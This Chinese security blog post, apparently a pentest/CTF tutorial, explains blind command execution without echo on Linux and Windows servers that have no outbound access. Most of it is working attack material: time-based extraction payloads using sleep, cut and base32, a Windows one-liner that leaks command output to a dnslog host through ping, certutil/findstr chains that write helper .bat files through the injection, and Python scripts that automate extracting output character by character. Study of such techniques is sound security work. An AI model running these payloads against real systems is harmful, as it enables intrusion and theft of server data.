Windows/Linux下的无回显命令执行

假设服务器不出网并且web目录不可写

Linux可以用类似盲注的方式得到回显，这次主要写下Windows的，其实也差不多

0x01 Linux

这个方法其实挺早就看到过，不知道为什么现在反而找不到了

方法和延时注入差不多，截取命令回显结果循环进行对比，对比到了就用sleep延时

首先要了解linux if语句

if [ command ];then
	符合条件执行的语句
elif [ command ];then
	符合条件执行的语句
else
	上面都不符合执行的语句
fi

这次只需要用到一个判断所以不用这么复杂

1
2

if [ 1 = 1 ];then sleep 2;fi		#这里的1=1条件成立就会执行下面的sleep 2语句
if [ `whoami|cut -c 1` = 'r' ];then sleep 2;fi		#取出whoami第一个字符对比是否为r，是r则sleep2秒

Linux下反引号是命令替换，一般来说是将执行获得的结果再执行一次，这里可以理解为将命令的结果保存下来后等号后面的字符对比

cut 命令是切割字符串，whoami|cut -c 1就是得到命令结果的第一个字符，以此类推

在一些回显中可能会出现很多符号，还有中文什么的，为了避免回显结果不准确的情况可以通过base32编码后再执行cut操作

1	if [ `whoami\|base32\|cut -c 1` = 'r' ];then sleep 2;fi

这里使用base32的原因是base32只有大写字母和2-7和=，减少了爆破字符数量，提高了回显结果的精准度

下面用python写个脚本

import requests
import string
str_zf = string.ascii_uppercase + "234567="

cmd = "pwd"
url = "http://10.130.4.204:8081/index.php?cmd="

def get_result(cmd ,url):
    result = ""
    for i in range(1, 65535):
        for s in str_zf:
            payload = "if [ `{}|base32|cut -c {}` = '{}' ];then sleep 5;fi".format(cmd, i, s)
            url_payload = url + payload
            response = requests.get(url_payload)
            time = response.elapsed.total_seconds()
            if time > 3:
                result += s
                print(result)
                break


if __name__ == '__main__':
    get_result(cmd, url)

执行结果：

解码后得到：

0x02 Windows

在Linux中可以通过ping带出命令，但是Windows不会把命令结果拼接到dnslog上，可以用for循环得到结果再进行拼接

1	for /F %i in ('echo a') do ping -n 1 %i.qzdxj3.dnslog.cn

这里就是多提一句，重点还是在不出网的情况下

Windows中的问题就是命令结果保存在哪里，并不可以像Linux一样直接截取

这次假设是web目录不可写，那就需要思考下写到别的目录该怎么读到

将命令回显的结果写到一个可写的目录下
使用certutil将命令结果base64编码，原因同上可以避免特殊字符，提高结果的准确度
用findstr /V参数去除多余的字符，将去除掉多余字符的base64编码再次写入一个文件

certutil -encode d:\\a d:\\b			#编码命令

文件格式:
-----BEGIN CERTIFICATE-----
base64
-----END CERTIFICATE-----

去除的是首行尾行的多余字符，\V参数是匹配到相同的字符然后去除

用for循环去除换行符
写入bat对比字符串

1 2	@echo off (for /f "delims=" %%i in ('type "d:\c"') do (set /p =%%i<nul))>"d:\d"

先写入上面的bat去除换行符

@echo off					#不打印输出
findstr /b %1 "d:\d"		#%1是接收输入，"a.bat 123"这样123就会到%1这个位置
#/b是从头开始匹配
IF ERRORLEVEL 1 echo a&&goto end
#ERRORLEVEL是类似错误号的东西，如果上面这个命令执行成功了就返回0，反之1,如果匹配不到的话这里就是1，然后goto跳到end，这里用goto原因是ERRORLEVEL不会传到下个命令，在下个命令看来IF ERRORLEVEL 1 echo a这个是执行成功的所以返回0，也会触发延迟，为了避免所以使用goto跳过
IF ERRORLEVEL 0 ping 127.0.0.1
#这里就是成功匹配返回0触发延迟
:end

然后再写入bat匹配字符串

1 2	a.bat 正确字符----延迟 a.bat 错误字符---不延迟

同样用python写个脚本

import requests
import string
command = "echo flag >d:\\a"
base64 = "certutil -encode d:\\a d:\\b"
base64_clean = "findstr /V \"^---\" d:\\b > d:\\c"
echo_b_bat = "echo @echo off>>d:\\b.bat"
echo_b_bat2 = "echo (for /f \"delims=\" %%i in ('type \"d:\\c\"') do (set /p =%%i^<nul))^>\"d:\\d\">>d:\\b.bat"
start = "d:\\b.bat"

echo_a_bat = "echo @echo off>>d:\\a.bat"
echo_a_bat1 = "echo findstr /b %1 \"d:\\d\">>d:\\a.bat"
echo_a_bat2 = "echo IF ERRORLEVEL 1 echo a^&^&goto end >>d:\\a.bat"
echo_a_bat3 = "echo IF ERRORLEVEL 0 ping 127.0.0.1>>d:\\a.bat"
echo_end = "echo :end>>d:\\a.bat"


cmd = [command, base64, base64_clean,echo_b_bat, echo_b_bat2, start, echo_a_bat,echo_a_bat1,echo_a_bat2,echo_a_bat3,echo_end]
url = "http://127.0.0.1/system.php"
for i in cmd:
    data = {
        "pass": i
    }
    requests.post(url, data=data)
print("[+]init success")

bp = string.ascii_letters + string.digits + "+/="
cmd_base64 = ""

for i in range(1,65535):
    for s in bp:
        data = {
            "pass": "d:\\a.bat " + cmd_base64 + s
        }
        response = requests.post(url, data=data)
        time = response.elapsed.total_seconds()
        if time > 3:
            cmd_base64 += s
            print(cmd_base64)
            break

Macchiato

2021-12-15

WEB

WEB安全

漏洞复现

CTF

常用工具

实战

代码审计

Javaweb

后渗透

内网渗透

免杀

进程注入

权限提升

漏洞复现

靶机

vulnstack

vulnhub

Root-Me

编程语言

java

逆向

PE

逆向学习

HEVD

PWN

CTF

heap

其它

关于博客

面试

杂谈

Windows/Linux下的无回显命令执行

0x01 Linux

0x02 Windows